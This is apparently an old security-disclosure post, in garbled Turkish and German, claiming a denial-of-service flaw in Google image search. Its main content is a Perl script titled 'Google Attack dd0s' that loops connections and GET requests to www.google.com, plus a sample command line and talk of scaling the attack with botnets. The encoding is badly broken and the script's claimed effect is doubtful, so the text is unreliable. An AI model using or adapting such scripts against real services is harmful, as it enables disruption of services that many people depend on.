Google Bug!

Ýlgililer'in dikkat'ine...


Merhaba;

Büyük arama motorlarindan biri olan google.com da ilk bakýþta ufak bir
hata fakat bir saldýrgan olarak düþünüldüðünde,
search butonunda tahmin edemeyeceðiniz kadar aðýr bi yoðunluða neden
olabilecegini dusundugumuz bir ddos açýðý tespit edildi mantýksal
olarak düþünürsek,
ayný anda 50 kullanýcý ayný sorguyu kullandýðýnda sadece
hissedersiniz birde kötü niyetli birinin ayný anda 2000 3000 user
veya botnet ile
bir saldýrý yapabileceði düþünülürse durum gerçekden ciddi sonuclar
doðurabilir tabi görmeden bu açýðý hiç kimse ile paylaþmadýðýmýzý
belirtirim
þimdi örneklendirme yapalim..



----------------------------------------------------------------------------------------------------------------

Target : >>> http://images.google.com.tr/images?svnum=10&hl=tr&gbv=2&q="inject
code"&btnG=Ara



test code #>$cat > googledos.pl

#!/usr/bin/perl -w
use IO:ocket;
print "[ #3l3ctr0c0d3 ] - [ Google Attack dd0s v 0.0 \n\n";
die "Usage: $0 <d0s c0d3>\n\n", if (@ARGV!=1);
$ARGV[0]=~s/\:/%3A/g;
$ARGV[0]=~s/\"/%22/g;
$ARGV[0]=~s/ /%20/g;
$ARGV[0]=~s/\?/%3F/g;
$ARGV[0]=~s/=/%3D/g;
for ($i=10;$i<=50;$i+=10){
$socket = IO:ocket::INET->new(
Proto => "tcp",
PeerAddr => "www.google.com",
#PeerAddr => "127.0.0.1",
PeerPort => "80") || die "Bagnalamadi..!";
print $socket "GET /images?svnum=10&hl=tr&gbv=2&q= HTTP/1.0\r\n\r
\n";
while ($resp=<$socket>){
if ($resp=~/p class=g/g){
$offset=pos($resp);
$ped=substr($resp,$offset+9,100);
while ($ped=~/>/g){
$o2=pos($ped);
last;
}
$site=substr($ped,9,$o2-10);
print "$site\n";
}
}
}

----------------------------------------------------------------------------------------------------------------


"test@electrocode:~$perl googledos.pl \â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â
\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â
\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â \â\â\â\â\â
\â\â\â\â\â\â\â
\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â\â \â\â\â\â\â
\â\â\â\â\â\â\â\â"

xd X 100 X 336 byte = 33600 x 1000 = 33600000



ACHTUNG!!!!!





Hallo;

An die welt grösste suchmachine der welt google.com ,das sie mich als
zu erst als eine trojaner dachten oder als virus
definierten,wen man es logisch denkt sind 50 user gleich zeitig
benutzen
könt ich es nur ahnen,aber einer der bössartig denkt der wüerde es mit
2200 bis 3000
user anfangen.aber da ich keine bösse apsichten haber möchte ich von
ihnen die erlaubnis haben. da ich eine beispiel geben möchte )







Saygýlar..

|3l3ctr0c0d3|

http://www.electrocode.com


ACHTUNG!!!!! und bitte deshalb die erlaubnis die likn beim google zu
frei zu geben.ZITAT ENDE